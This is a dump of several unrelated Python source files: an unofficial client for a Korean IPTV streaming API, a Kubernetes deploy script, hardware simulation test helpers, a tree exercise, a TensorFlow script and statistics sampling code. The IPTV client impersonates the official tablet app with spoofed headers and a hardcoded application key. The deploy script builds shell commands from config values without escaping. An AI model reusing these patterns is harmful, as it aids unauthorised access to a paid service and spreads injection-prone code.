    were factored into private helpers; boolean flags are converted to
    the API's 0/1 ints idiomatically.  Public method signatures and
    return values are unchanged.
    """

    # Headers imitating the official Windows tablet client.
    request_headers = {
        'requestHostname': 'otmapp',
        'User-Agent': 'OMS (compatible;ServiceType/OTM;DeviceType/WIN8PAD;DeviceModel/G41TM6;OSType/WINM;OSVersion/8.1.0;AppVersion/1.2.1.1)'
    }
    applicationKey = 'IG9RIXFXD24R1DS2LRSD1HKLD8QQZKL6'

    def __init__(self):
        self.websession = requests.Session()
        self.userinfo = None            # raw login response once logged in
        self.uuid = uuid.uuid4().hex    # per-client device identifier
        self.session_id = None          # current streaming session id

    def _auth_headers(self):
        # Headers required by the omas login endpoints.
        return {'applicationKey': self.applicationKey, 'transactionId': '0',
                'timestamp': '', 'requestHostname': 'otmapp'}

    def _finish_login(self, userinfo, raw):
        # Shared post-processing for both login flavours: store the user
        # info and return True on the server's success message.
        if raw:
            return userinfo
        if userinfo.get('systemMessage') == u'로그인에 성공하였습니다.':
            self.userinfo = userinfo
            return True
        return False

    def login(self, username, password, raw=False):
        """Password login; returns True/False, or the raw JSON when raw=True."""
        userinfo = self.websession.post(
            'https://omas.megatvdnp.co.kr/login/olleh',
            json={'userId': username, 'userPwd': password},
            headers=self._auth_headers()).json()
        return self._finish_login(userinfo, raw)

    def login_token(self, token, raw=False):
        """Auto-login with a saved token; same return values as login()."""
        userinfo = self.websession.post(
            'https://omas.megatvdnp.co.kr/login/auto',
            json={'toknVal': token},
            headers=self._auth_headers()).json()
        return self._finish_login(userinfo, raw)

    def _session_request(self, action, extra_params=None):
        # POST to a session endpoint; every call carries the device uuid.
        params = {'uuid': self.uuid}
        if extra_params:
            params.update(extra_params)
        return self.websession.post(
            'http://contents.megatvdnp.co.kr/app5/0/API/%s.aspx' % action,
            headers=self.request_headers, params=params).json()

    def session_create(self, raw=False):
        """Create a streaming session; returns its id, or False on failure."""
        session = self._session_request('create_session')
        if raw:
            return session
        if session.get('meta').get('code') == 200:
            self.session_id = session.get('data').get('session_id')
            return self.session_id
        return False

    def session_ready(self, raw=False):
        """Signal readiness for the current session; True on success."""
        session = self._session_request('ready_session')
        if raw:
            return session
        return session.get('meta').get('code') == 200

    def session_check(self, session_id=None, raw=False):
        """Check a session (defaults to the stored one); True when alive."""
        if session_id is None:
            session_id = self.session_id
        session = self._session_request('check_session', {'session_id': session_id})
        if raw:
            return session
        return session.get('meta').get('code') == 200

    def session_delete(self, session_id=None, raw=False):
        """Delete a session (defaults to the stored one); True on success."""
        if session_id is None:
            session_id = self.session_id
        session = self._session_request('delete_session', {'session_id': session_id})
        if raw:
            return session
        if session.get('meta').get('code') == 200:
            self.session_id = None
            return True
        return False

    def _fetch_channel_list(self, test):
        # Channel listing shared by get_channels()/get_my_channels().
        return self.websession.get(
            'http://menu.megatvdnp.co.kr:38080/app5/0/api/epg_chlist',
            params={'category_id': 1, 'istest': int(bool(test))},
            headers=self.request_headers).json()

    def get_channels(self, test=False, raw=False):
        """Return the public channel list, or None on failure."""
        channels = self._fetch_channel_list(test)
        if raw:
            return channels
        if channels.get('meta').get('code') == '200':
            return channels.get('data').get('list')[0].get('list_channel')
        return None

    def get_my_channels(self, test=False, raw=False):
        """Return the user's channel list, or None on failure."""
        channels = self._fetch_channel_list(test)
        if raw:
            return channels
        if channels.get('meta').get('code') == '200':
            return channels.get('data').get('list')[0].get('list_my_channel')
        return None

    def get_epg(self, ch_no, test=False, raw=False):
        """Return the programme list for channel ch_no, or None on failure."""
        epgdata = self.websession.get(
            'http://menu.megatvdnp.co.kr:38080/app5/0/api/epg_proglist',
            params={'ch_no': ch_no, 'istest': int(bool(test))},
            headers=self.request_headers).json()
        if raw:
            return epgdata
        if epgdata.get('meta').get('code') == '200':
            return epgdata.get('data').get('list')
        return None

    def get_channel_url(self, ch_no, bit_rate, raw=False):
        """Resolve the stream URL payload for a live channel.

        NOTE(review): bit_rate feeds 'bit_rate_option' while 'bit_rate'
        itself is fixed to 'S' -- confirm against the upstream API.
        """
        request_query = {
            'istest': 0,
            'ch_no': ch_no,
            'bit_rate': 'S',
            'bit_rate_option': bit_rate,
            'user_model': 'G41TM6',
            'user_os': 'Win10.0',
            'user_type': 'Computer.Desktop',
            'user_net': 'WIFI'
        }
        urlinfo = self.websession.get(
            'http://menu.megatvdnp.co.kr:38080/app5/0/api/epg_play',
            headers=self.request_headers, params=request_query).json()
        if raw:
            return urlinfo
        if urlinfo.get('meta').get('code') == '200':
            return urlinfo.get('data')
        return None
|
20,761 | 5139568f8eaaaf5fafc0d8a9f01aae89c5a41ea8 | #Print * Rectangle
'''
*****
*****
*****
*****
*****
'''
for i in range(1,6):
for j in range(1,6):
print("*",end="") # By default line ended with new line, here we define, nothing to be added at the end of line
print()
print(" 22222 +++++++ =======================================")
#Print * Rectangle
'''
*****
* *
* *
* *
*****
'''
for i in range(1,6):
for j in range(1,6):
if(i==1 or i==5):
print("*",end="")
else:
if(j==1 or j==5):
print("*", end="")
else:
print(" ",end="")
print() |
20,762 | 96ce8b4fd12e404bd6db252fad3f473f3d727374 | import yaml
import os
import time
import json
import re
BASE_PATH = '/Users/ssharat/Documents/'
INPUT_YAML = BASE_PATH + 'acme/acme_fitness_demo/deploy_acme.yaml'
class DeployApplication(object):
    """Drives kubectl/helm to deploy either the acme demo application or
    the Wavefront collector, configured from one section of a deploy YAML.

    Fixes: missing-application lookups raise KeyError (the old
    `except IndexError` could never fire); update_config() no longer hits
    an unbound `pod_ip` when no Jaeger pod exists; check_deployment()
    polls in a loop instead of recursing; files are handled via `with`.
    """

    def __init__(self, _yaml, _app):
        """Load section _app ('acme_application' or 'wavefront_application')
        from the YAML file at _yaml."""
        try:
            with open(_yaml, "r") as stream:
                self._app = _app
                # NOTE(review): yaml.load with FullLoader -- fine for trusted
                # config; use safe_load if the file can come from users.
                self.deploy_info = yaml.load(stream, Loader=yaml.FullLoader)
                self.deployments = []
                self.ns = self.deploy_info[_app]['namespace']
                if self._app == 'acme_application':
                    # Apply requested node labels before deploying.
                    node_label_map = self.deploy_info[_app]['nodeselector']
                    if node_label_map:
                        for node, label in node_label_map.items():
                            _ = os.system('kubectl label nodes %s %s' % (node, label))
                    self.secrets = self.deploy_info[_app]['secret']
                    self.deployments = self.deploy_info[_app]['deploy']
                    self.configmaps = self.deploy_info[_app]['configmap']
                elif self._app == 'wavefront_application':
                    self.token = self.deploy_info[_app]['api_token']
                    self.url = self.deploy_info[_app]['wavefront_url']
                    self.cluster = self.deploy_info[_app]['cluster_name']
        except OSError:
            print('File not found - check path!')
            return
        except (KeyError, IndexError):
            # Fix: dict lookups raise KeyError, which the old IndexError
            # handler silently missed.
            print('Application %s not found in YAML' % _app)
            return

    def _get_pods(self):
        # Fetch the namespace's pods as parsed JSON via kubectl.
        cmd = 'kubectl get pods -n %s -o json | jq' % self.ns
        get_pods_raw = os.popen(cmd).read().strip().replace('\n', '')
        return json.loads(get_pods_raw)

    def check_deployment(self):
        """Poll every 10s until all pods in the namespace are Running."""
        while True:
            pending = [_item for _item in self._get_pods()['items']
                       if _item['status']['phase'] != 'Running']
            if not pending:
                print('All PODs in running state')
                return
            for _item in pending:
                print("POD %s in state %s" % (_item['metadata']['name'], _item['status']['phase']))
            print("Sleep 10sec and retry!")
            time.sleep(10)

    def create_ns(self):
        """Create the target namespace."""
        _ = os.system("kubectl create ns %s" % self.ns)

    def create_secret(self):
        """Create every secret listed in the YAML in the namespace."""
        for secret in self.secrets:
            _ = os.system('kubectl create secret %s -n %s' % (secret, self.ns))

    def deploy(self):
        """Apply all deployment manifests, wait for pods, then start the
        app-specific services (frontend URL or Wavefront helm chart)."""
        for deploy in self.deployments:
            print('Deploying %s in ns %s' % (deploy, self.ns))
            _ = os.system('kubectl apply -f %s -n %s' % (deploy, self.ns))
        self.check_deployment()
        if self._app == 'acme_application':
            print('Starting Front-End application:')
            out = os.popen('minikube service --url frontend -n %s' % self.ns)
            print(out)
        elif self._app == 'wavefront_application':
            print('Deploying wavefront proxy and collector using helm-charts')
            out = os.popen('helm install wavefront wavefront/wavefront '
                           '--set wavefront.url=%s '
                           '--set wavefront.token=%s '
                           '--set clusterName=%s '
                           '--namespace=%s' % (self.url, self.token, self.cluster, self.ns)).read()
            print(out)

    def create_configmap(self):
        """Create every configmap listed in the YAML in the namespace."""
        for configmap in self.configmaps:
            _ = os.system('kubectl create -f %s -n %s' % (configmap, self.ns))

    def update_config(self):
        """Rewrite the JAEGER_AGENT_HOST value in every deployment YAML to
        the current Jaeger pod IP in this namespace."""
        pod_ip = None
        for _item in self._get_pods()['items']:
            if 'jaeger' in _item['metadata']['name']:
                pod_ip = _item['status']['podIP']
                break
        if pod_ip is None:
            # Fix: the old code fell through with pod_ip unbound (NameError).
            raise RuntimeError('No jaeger pod found in namespace %s' % self.ns)
        for deploy in self.deployments:
            new_file_content = ""
            replace_str = False
            print('Replacing pod-ip %s in file %s' % (pod_ip, deploy))
            with open(deploy, 'r') as read_file:
                for line in read_file:
                    # The value line to patch immediately follows the
                    # 'JAEGER_AGENT_HOST' name line.
                    if replace_str:
                        line = re.sub("value.*", "value: \'%s\'" % pod_ip, line)
                        replace_str = False
                    if 'JAEGER_AGENT_HOST' in line:
                        replace_str = True
                    new_file_content += line
            with open(deploy, "w") as write_file:
                write_file.write(new_file_content)
# Driver-code
if __name__ == '__main__':
    # Workflow-1: Instantiate class to deploy acme microservices
    acme = DeployApplication(INPUT_YAML, 'acme_application')
    # One-time bootstrap steps (namespace/secrets/configmaps) are left
    # commented out; by default only the config refresh and deploy run.
    # acme.create_ns()
    acme.update_config()
    # acme.create_secret()
    # acme.create_configmap()
    acme.deploy()
    # Workflow-2: Instantiate class to deploy wf
    # wf = DeployApplication(INPUT_YAML, 'wavefront_application')
    # wf.create_ns()
    # wf.deploy()
|
20,763 | 3fee72a1dd914c0d1aff988416709e6a0402c6e5 | import movie
if __name__ == '__main__':
avatar = movie.Movie()
print("here") |
20,764 | fb67e7f063f9885146202f43c9ac8d20e4721810 | import os
import subprocess
import matplotlib.pyplot as plt
import numpy as np
from numpy import ndarray
from pathlib import Path
from numpy.lib.type_check import iscomplex
from scipy.io import wavfile
from stringcase import titlecase, snakecase
from cocotb.binary import BinaryValue, BinaryRepresentation
from cocotb_test import simulator
test_dir = Path(__file__).parent
src_dir = test_dir.parent / 'src'
results_dir = test_dir / 'results'
class BaseTest:
    """Common scaffolding for cocotb/icarus simulator test classes.

    Subclasses are expected to be named ``Test<PascalName>``; the DUT module
    name and a human-readable title are derived lazily from the class name.
    """
    _module_name = None
    _title_name = None

    def setup(self):
        """Per-test hook: start every test from a clean simulator cache."""
        self.clean_sim_cache()

    @property
    def module_name(self):
        """snake_case DUT name derived from the class name (cached)."""
        if self._module_name is None:
            pascal_name = self.__class__.__name__.split('Test')[1]
            self._module_name = snakecase(pascal_name)
        return self._module_name

    @property
    def title_name(self):
        """Human-readable title used as the log prefix (cached)."""
        if self._title_name is None:
            self._title_name = titlecase(self.__class__.__name__)
        return self._title_name

    @property
    def folder_dir(self) -> Path:
        """Per-module results directory, created on demand."""
        # Create folder if does not exist
        results_dir.mkdir(exist_ok=True)
        folder_dir = results_dir / self.module_name
        folder_dir.mkdir(exist_ok=True)
        return folder_dir

    def log(self, msg):
        """Print *msg* prefixed with the test title."""
        print(f'[{self.title_name}] {msg}')

    def clean_sim_cache(self):
        """Delete the cocotb ``sim_build`` cache directory if present."""
        import shutil  # local import: only needed here

        cache_path = test_dir / 'sim_build'
        if cache_path.exists():
            # Fix: use shutil.rmtree instead of shelling out to
            # `rm -r <interpolated path>` (portable, no shell string).
            shutil.rmtree(cache_path)

    def list_verilog_files(self):
        """Absolute paths of every Verilog source under src/ (recursive)."""
        return [str(p.absolute()) for p in src_dir.glob('**/*.v')]

    def transform_params(self, parameters):
        """Return a dict with every value stringified; None becomes {}."""
        str_params = {}
        if parameters is not None:
            for key, value in parameters.items():
                str_params[key] = str(value)
        return str_params

    def run_simulator(self, name=None, parameters=None, module=None, values=None):
        """Run a cocotb simulation for *name* (defaults to ``module_name``).

        *parameters* are passed as HDL parameters; both *parameters* and
        *values* are also exported via the environment for the Python
        testbench to read.
        """
        if name is None:
            name = self.module_name
        if module is None:
            module = f'tests.test_{name}'
        parameters = self.transform_params(parameters)
        values = self.transform_params(values)
        os.environ['SIM'] = 'icarus'
        print(f'Testing {name} with parameters: {parameters}')
        print(f'Testing {name} with values: {values}')
        # transform_params always yields a dict, so a plain merge suffices
        # (the original re-checked for None and looped item by item).
        extra_env = {}
        extra_env.update(parameters)
        extra_env.update(values)
        return simulator.run(
            verilog_sources=self.list_verilog_files(),
            toplevel=name,
            module=module,
            parameters=parameters,
            extra_env=extra_env,
            sim_build="sim_build/"
            + "_".join(("{}={}".format(*i) for i in parameters.items())),
        )
class BaseSignalTest(BaseTest):
    """BaseTest extension with DSP helpers: stimulus generation, quantization,
    FFT analysis in dB, plotting/WAV dumping of results, and spectral
    assertions (tone location, SNR, band integrity)."""
    # Default bit width used by set_data when none is supplied.
    data_length = 16
    def set_data(
        self,
        data:int,
        data_length=None,
        representation=BinaryRepresentation.TWOS_COMPLEMENT,
    ):
        """Wrap *data* in a little-endian cocotb BinaryValue.

        NOTE: a non-None *data_length* is sticky — it overwrites
        ``self.data_length`` for all subsequent calls.
        """
        if data_length is not None:
            self.data_length = data_length
        return BinaryValue(
            value=data,
            n_bits=self.data_length,
            bigEndian=False,
            binaryRepresentation=representation,
        )
    def set_uns_data(self, data:int, data_length=None):
        """Unsigned-representation variant of set_data."""
        return self.set_data(
            data=data,
            data_length=data_length,
            representation=BinaryRepresentation.UNSIGNED,
        )
    def quantizer(self, data, width, uns=False) -> ndarray:
        """Scale normalized samples to *width*-bit integers with clipping."""
        if uns:
            d_min = 0
            d_max = 2**width - 1
            gain = 2**width
        else:
            d_min = -2**(width-1)
            d_max = 2**(width-1)-1
            gain = 2**(width-1)
        return np.clip(np.array(data)*gain, d_min, d_max).astype(int)
    def generate_norm_sin(self, size, fc, fs=8e3):
        """Unit-amplitude sine at *fc* Hz, *size* samples at rate *fs*."""
        n = np.linspace(0, size-1, size)
        t = n/fs
        return np.sin(2*np.pi*fc*t)
    def generate_norm_complex_exp(self, size, fc, fs=8e3):
        """Unit complex exponential exp(j*2*pi*fc*t) sampled at *fs*."""
        n = np.linspace(0, size-1, size)
        t = n/fs
        return np.exp(1j*2*np.pi*fc*t)
    def generate_sin(self, size, fc, width, fs=8e3):
        """Integer sine scaled to the full signed *width*-bit range."""
        data_norm = self.generate_norm_sin(size, fc, fs)
        return (data_norm*(2**(width-1)-1)).astype(int).tolist()
    def calc_fft(self, data: ndarray, N=None, is_complex=False):
        """Hann-windowed magnitude spectrum in dB.

        Complex input: returns all N bins, halves swapped so DC is centered.
        Real input: returns the positive-frequency half (N/2 bins).
        """
        if N is None:
            N = int(len(data)/2)*2
        windowed_data = data * np.hanning(len(data))
        result = 20*np.log10(
            np.abs(
                np.fft.fft(windowed_data, N)
            ) / N
        )
        if is_complex:
            # Manual fftshift: move negative frequencies to the left half.
            data = np.zeros(N)
            data[:int(N/2)] = result[int(N/2):]
            data[int(N/2):] = result[:int(N/2)]
            return data
        return result[:int(N/2)]
    def show_fft(self, data: ndarray, fs=48e3, N=None, is_complex=False, show=True, name=None):
        """Plot the dB spectrum; display it, or save to *name* if show=False."""
        if N is None:
            N = int(len(data)/2)*2
        if is_complex:
            f = np.linspace(-fs/2, fs/2, N)
        else:
            f = np.linspace(0, fs/2, int(N/2))
        fft = self.calc_fft(data, N, is_complex)
        plt.clf()
        plt.plot(f, fft)
        if show:
            plt.show()
        else:
            plt.savefig(name)
    def save_plot(self, data, name, test_name):
        """Save a time-domain plot (real+imag traces for complex data)."""
        test_dir: Path = self.folder_dir / test_name
        test_dir.mkdir(exist_ok=True)
        output_file = test_dir / name
        plt.clf()
        if np.iscomplex(data).any():
            plt.plot(data.real)
            plt.plot(data.imag)
        else:
            plt.plot(data)
        plt.savefig(output_file)
    def save_wav_data(self, data:ndarray, name, test_name, fs=8000):
        """Write samples to a WAV file; complex data becomes two channels."""
        test_dir: Path = self.folder_dir / test_name
        test_dir.mkdir(exist_ok=True)
        output_file = test_dir / name
        # The string check also catches complex dtypes whose values happen
        # to have zero imaginary part (np.iscomplex would report False).
        if np.iscomplex(data).any() or 'complex' in str(type(data[0])):
            data = np.array([data.real, data.imag]).transpose()
        wavfile.write(str(output_file), int(fs), data)
    def save_data(self, data, name, test_name, fs=8000):
        """Dump both a WAV file and a PNG plot for *data*."""
        self.save_wav_data(data, f'{name}.wav', test_name, fs)
        self.save_plot(data, f'{name}.png', test_name)
    def save_fft_data(self, data, name, test_name, fs, N=None, is_complex=False):
        """Dump the spectrum as a normalized WAV plus a PNG plot."""
        fft = self.calc_fft(data, N, is_complex)
        self.save_wav_data(fft/np.max(fft), f'{name}.wav', test_name, 8e3)
        test_dir: Path = self.folder_dir / test_name
        test_dir.mkdir(exist_ok=True)
        output_file = test_dir / f'{name}.png'
        self.show_fft(data, fs, N, is_complex, show=False, name=output_file)
    def check_sin(self, data: ndarray, fc: float, fc_band=200, fs=8e3, snr=30, N=None):
        """Assert *data* holds a tone near *fc* (within fc_band) with at
        least *snr* dB of signal-to-noise ratio."""
        if N is None:
            N = len(data)
        half_N = int(N/2)
        windowed_data = data * np.hanning(len(data))
        fft_data: ndarray = np.abs(np.fft.fft(windowed_data, N))[:half_N]
        half_fs = fs/2
        # Convert the expected frequency and band to bin indices.
        fc_bin = fc*half_N/half_fs
        half_bw_bin = fc_band*half_N/(2*half_fs)
        bw_low_bin = int(np.floor(fc_bin-half_bw_bin))
        bw_high_bin = int(np.ceil(fc_bin+half_bw_bin))
        self.log(f'fc BW bins: {(bw_low_bin, bw_high_bin)}')
        self.log(f'fc bin: {fc_bin}')
        # Check sin frequency is within the specified bounds
        max_bin = fft_data.argmax()
        self.log(f'max bin: {max_bin}')
        self.log(f'max frequency: {max_bin/half_N*half_fs}')
        assert bw_low_bin <= max_bin and max_bin <= bw_high_bin
        # Check SNR
        sin_data = fft_data[bw_low_bin:bw_high_bin+1]
        noise_data = fft_data*1.0
        noise_data[bw_low_bin:bw_high_bin+1] = 0
        powered_sin = np.sum(np.power(sin_data, 2))
        powered_noise = np.sum(np.power(noise_data, 2))
        sin_snr = 10*np.log10(powered_sin/powered_noise)
        self.log(f'Power sin: {powered_sin}')
        self.log(f'Power noise: {powered_noise}')
        self.log(f'Perceived SNR: {sin_snr}')
        assert sin_snr > snr
    def check_signal_integrity(
        self,
        data_in,
        data_out,
        freq_band,
        fs,
        min_db,
        max_diff_db,
    ):
        """Assert in/out spectra differ by < *max_diff_db* inside *freq_band*
        (both spectra floored at *min_db* before comparison)."""
        len_data = len(data_in)
        min_bin, max_bin = (int(f/fs*len_data) for f in freq_band)
        fft_in = self.calc_fft(data_in)[min_bin:max_bin]
        fft_out = self.calc_fft(data_out)[min_bin:max_bin]
        clipped_in = np.clip(fft_in, min_db, 10)
        clipped_out = np.clip(fft_out, min_db, 10)
        diff_abs = np.abs(clipped_out - clipped_in)
        assert max(diff_abs) < max_diff_db
class BaseSdrTest(BaseSignalTest):
    """Signal-test base with SDR-style sample-rate conversion helpers."""

    def interpolate(self, data: np.ndarray, rate: int, N=500):
        """Upsample *data* by *rate*: zero-stuffing plus sinc reconstruction.

        Bug fix: the original loop only visited the first ``len(data)`` of
        the ``len(data) * rate`` output slots and kept samples where
        ``i % rate`` was non-zero, so the stuffed buffer was mostly zeros
        and the sample placement was inverted. Samples now land every
        *rate*-th slot, the standard zero-stuffing layout.
        """
        len_data = len(data)
        data_interp = np.zeros(len_data * rate)
        data_interp[::rate] = data
        # Truncated sinc reconstruction filter (N taps).
        n = np.linspace(-N/2, N/2-1, N)
        kernel = np.sinc(n/rate)
        return np.convolve(data_interp, kernel, 'same')

    def decimate(self, data: np.ndarray, rate: int, N=500):
        """Downsample by *rate*: windowed-sinc anti-alias filter, then keep
        every *rate*-th sample."""
        len_data = len(data)
        n = np.linspace(-N/2, N/2-1, N)
        # Hann-windowed sinc low-pass with 2/rate gain compensation.
        # (renamed from `filter`, which shadowed the builtin)
        kernel = 2/rate*np.sinc(n/rate)*np.hanning(N)
        filtered = np.convolve(data, kernel, 'same')
        if len_data < len(kernel):
            # 'same' returns max(len(data), N) samples; trim back to the
            # input length when the kernel is longer than the data.
            filtered = filtered[int((N-len_data)/2):int((N+len_data)/2)]
        return filtered[::rate]
|
20,765 | 4a6684b160f49f80bb172a88bb4ea536214ad9dc | # Generated by Django 2.0.7 on 2018-07-31 09:57
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: tweaks two IntegerFields on `usertask`
    # (adds a db_index to passed_count; sets defaults and verbose names).

    dependencies = [
        ('user', '0003_auto_20180731_1731'),
    ]

    operations = [
        migrations.AlterField(
            model_name='usertask',
            name='passed_count',
            field=models.IntegerField(db_index=True, default=0, verbose_name='审核通过条数'),
        ),
        migrations.AlterField(
            model_name='usertask',
            name='passed_reward_count',
            field=models.IntegerField(default=0, verbose_name='奖励数量'),
        ),
    ]
|
20,766 | 58d67fbfa86877f714b3bde285a4c417c9b7b3d0 | #Author guo
# -*- coding:utf-8 -*-
class TreeNode:
    """A binary-tree node: payload ``val`` plus ``left``/``right`` links."""

    def __init__(self, x):
        self.val = x
        self.left = self.right = None
# Symmetry test via serialization: produce a left-first pre-order and a
# right-first pre-order of the same tree and compare the two sequences.
class Solution:
    """Check whether a binary tree is symmetric (a mirror of itself)."""

    def isSymmetrical(self, pRoot):
        """Return True when the tree rooted at *pRoot* is its own mirror."""
        # write code here
        return self.isSymm(pRoot, pRoot)

    def isSymm(self, root1, root2):
        """Compare the left-first traversal of root1 with the right-first
        traversal of root2."""
        if root1 is None and root2 is None:
            return True
        if root1 is None or root2 is None:
            return False
        root1list = self.front(root1, [])
        root2list = self.back(root2, [])
        print(root1list)
        print(root2list)
        return root1list == root2list

    def front(self, root, x=None):
        """Left-first pre-order serialization; 99999 marks a missing child.

        Bug fix: the original used a mutable default (``x=[]``) which is
        shared across calls and silently accumulates state.
        NOTE(review): node values equal to the 99999 sentinel would confuse
        the comparison — assumed out of range for the inputs.
        """
        if x is None:
            x = []
        if root is None:
            return x.append(99999)
        x.append(root.val)
        self.front(root.left, x)
        self.front(root.right, x)
        return x

    def back(self, root, y=None):
        """Right-first pre-order serialization; 99999 marks a missing child.

        Bug fix: same mutable-default repair as ``front``.
        """
        if y is None:
            y = []
        if root is None:
            return y.append(99999)
        y.append(root.val)
        self.back(root.right, y)
        self.back(root.left, y)
        return y
# Build the sample tree used for the manual check:
#            8
#          /   \
#         6     10
#        / \    / \
#       5   7  9   11
# The left (6) and right (10) subtrees carry different values, so the
# mirrored traversals differ and the symmetry check yields False.
pNode1 = TreeNode(8)
pNode2 = TreeNode(6)
pNode3 = TreeNode(10)
pNode4 = TreeNode(5)
pNode5 = TreeNode(7)
pNode6 = TreeNode(9)
pNode7 = TreeNode(11)
pNode1.left = pNode2
pNode1.right = pNode3
pNode2.left = pNode4
pNode2.right = pNode5
pNode3.left = pNode6
pNode3.right = pNode7
S = Solution()
result = S.isSymmetrical(pNode1)
print(result) |
20,767 | eedcdd3de2e267e260c93d17e9d6c888c496aff6 | '''
A logistic regression learning algorithm example using TensorFlow library.
This example is using the MNIST database of handwritten digits
(http://yann.lecun.com/exdb/mnist/)
Author: Aymeric Damien
Project: https://github.com/aymericdamien/TensorFlow-Examples/
'''
import pandas as pd
import numpy as np
import tensorflow as tf
def parser(serialized_example):
    """Parse one serialized tf.Example into (env, label) tensors.

    env: float32 tensor of shape [1, 4], cast from the int64 'env' feature.
    label: the float32 'label' feature reshaped to (1, 1).
    Uses the TF 1.x ``tf.parse_single_example`` API.
    """
    features = tf.parse_single_example(
        serialized_example,
        features={
            'env': tf.FixedLenFeature([1, 4], tf.int64),
            # 'env_segment_number': tf.FixedLenFeature([], tf.int64),
            # 'env_segment_cpu': tf.FixedLenFeature([], tf.int64),
            # 'env_segment_mem': tf.FixedLenFeature([], tf.int64),
            # 'query_plan_ops': tf.VarLenFeature(tf.string),
            # 'query_table_size': tf.VarLenFeature(tf.float32),
            # 'segment_cpu_usage': tf.VarLenFeature(tf.float32),
            'label': tf.FixedLenFeature([], tf.float32)
        })
    env = tf.cast(features['env'], tf.float32)
    # image.set_shape([DEPTH * HEIGHT * WIDTH])
    # # Reshape from [depth * height * width] to [depth, height, width].
    # image = tf.cast(
    #     tf.transpose(tf.reshape(image, [DEPTH, HEIGHT, WIDTH]), [1, 2, 0]),
    #     tf.float32)
    # NOTE(review): `label` below is never used — the returned tensor is
    # reshaped directly from the raw feature.
    label = tf.cast(features['label'], tf.float32)
    reshape_label = tf.reshape(features['label'], (1,1))
    return env, reshape_label
# TF 1.x graph-mode training script: softmax "logistic regression" over the
# 4-wide `env` feature parsed from a TFRecord file, trained with plain SGD.
EPOCHS = 10
BATCH_SIZE = 100
# Parameters
learning_rate = 0.01
training_epochs = 25
display_step = 1
# tf Graph Input
#x = tf.placeholder(tf.float32, [4, 1]) # mnist data image of shape 28*28=784
#y = tf.placeholder(tf.float32, [1, None])
# Set model weights
W = tf.Variable(tf.zeros([4, 1]))
b = tf.Variable(tf.zeros([1]))
# Gradient Descent
# Initialize the variables (i.e. assign their default value)
init = tf.global_variables_initializer()
handle = tf.placeholder(tf.string, shape=[])
# Start training
with tf.Session() as sess:
    #filename_queue = tf.train.string_input_producer(['./data/queries_samples/01'], num_epochs=1)
    # Run the initializer
    #cols = ['seg','cpu','mem','label']
    #train = pd.read_csv('../data/queries_samples/01.csv',delimiter=',',names = cols)
    #test = pd.read_csv('data/ua.test',delimiter='\t',names = cols)
    record_defaults = [tf.float32] * 4 # Eight required float columns
    dataset = tf.data.TFRecordDataset("../data/queries_samples/02").repeat()
    dataset = dataset.map(parser)
    #dataset = dataset.batch(BATCH_SIZE)
    # NOTE(review): `iter` shadows the Python builtin; kept as-is.
    iter = dataset.make_one_shot_iterator()
    sess.run(init)
    x, y = iter.get_next()
    #env, label = read_and_decode(filename_queue)
    #dataset = dataset.repeat(training_epochs)
    # Construct model
    pred = tf.nn.softmax(tf.matmul(x, W) + b) # Softmax
    # Minimize error using cross entropy
    cost = tf.reduce_mean(-tf.reduce_sum(y*tf.log(pred), reduction_indices=1))
    optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost)
    sess.run(tf.global_variables_initializer())
    # Training cycle
    for epoch in range(training_epochs):
        #batch = dataset.batch(batch_size)
        total_batch = 100
        #train_iterator_handle = sess.run(iter.string_handle())
        avg_cost = 0.
        # Loop over all batches
        for i in range(EPOCHS):
            #batch_xs, batch_ys = dataset.batch(batch_size)
            #next_element = iter.get_next()
            # Run optimization op (backprop) and cost op (to get loss value)
            # NOTE(review): this extra sess.run([x, y]) advances the one-shot
            # iterator an additional step per loop iteration — presumably
            # unintended; verify against the data pipeline.
            sess.run([x, y])
            _, c = sess.run([optimizer, cost])
            print("Epoch:", '%04d' % (epoch+1), "cost=", "{:.9f}".format(c))
            # Compute average loss
            #avg_cost += c / total_batch
    # Display logs per epoch step
    print("Optimization Finished!")
    # Test model
    #correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))
    # Calculate accuracy
    #accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    #print("Accuracy:", accuracy.eval({x: mnist.test.images, y: mnist.test.labels}))
|
20,768 | fa0f06fc2d348d1430552e633c1d46808f8bcdbd | # -*- coding: utf-8 -*-
"""
Created on Thu Oct 26 17:55:59 2017
@author: Ricardo Chávez Cáliz
"""
import numpy as np
from numpy import zeros
from numpy import log
from numpy import exp
from numpy.random import rand
from numpy.random import normal
from numpy.random import gamma
from numpy.random import exponential
from numpy.random import weibull
from numpy.random import poisson
from scipy.special import gammaln as loggamma
from matplotlib.mlab import bivariate_normal
import matplotlib.pyplot as plt
def Bernoulli(p):
    """Draw one Bernoulli(p) sample.

    :param p: success probability, must satisfy 0 <= p <= 1
    :return: int, 1 on success and 0 on failure
    :raises ValueError: if p lies outside [0, 1]
    """
    # Validate before consuming randomness: the original drew a uniform
    # sample first and only then rejected invalid parameters.
    if p > 1 or p < 0:
        raise ValueError("El parametro no es apropiado")
    return 1 if rand(1) < p else 0
def vectorGauss(m, sigma):
    """Sample one k-dimensional Gaussian vector N(m, sigma).

    m is a (k, 1) column vector and sigma a (k, k) covariance matrix.
    """
    dim = len(m)
    # Cholesky factor of the covariance matrix.
    chol = np.linalg.cholesky(sigma)
    # Fill a standard-normal column vector, one N(0,1) draw per component.
    std_normal = np.zeros([dim, 1], dtype=float)
    for idx in range(dim):
        std_normal[idx] = np.random.normal(0, 1)
    # Shift and correlate: X = m + U^T Z.
    return m + np.dot(np.transpose(chol), std_normal)
def muestraNMV(m, sigma, n):
    """Draw an (n, k) matrix whose rows are N(m, sigma) samples."""
    dim = len(m)
    sample = np.zeros((n, dim))
    for row in range(n):
        draw = vectorGauss(m, sigma)
        for col in range(dim):
            sample[row, col] = draw[col, 0]
    return sample
def grafBivariada(m,sigma):
    """
    Plot level contours of the bivariate normal N(m, sigma).

    NOTE(review): relies on matplotlib.mlab.bivariate_normal, which was
    removed from modern matplotlib (>= 3.1) — this module only runs against
    older matplotlib releases.
    """
    m1=m[0,0]
    m2=m[1,0]
    s1=np.sqrt(sigma[0,0])
    s2=np.sqrt(sigma[1,1])
    ro=(sigma[0,1])/(s1*s2)
    # Eigen-decomposition of the covariance matrix.
    Eig = np.linalg.eig(sigma)
    # Normalized eigenvectors.
    V1 = np.array([Eig[1][0][0], Eig[1][1][0]])
    V2 = np.array([Eig[1][0][1], Eig[1][1][1]])
